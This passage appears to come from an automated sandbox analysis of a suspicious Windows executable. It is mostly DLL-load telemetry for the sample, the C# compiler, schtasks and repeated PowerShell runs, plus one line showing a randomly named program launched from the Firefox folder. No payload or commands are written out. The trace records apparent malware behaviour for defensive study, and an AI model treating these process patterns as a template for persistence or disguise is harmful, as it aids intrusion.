Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: mscoree.dll
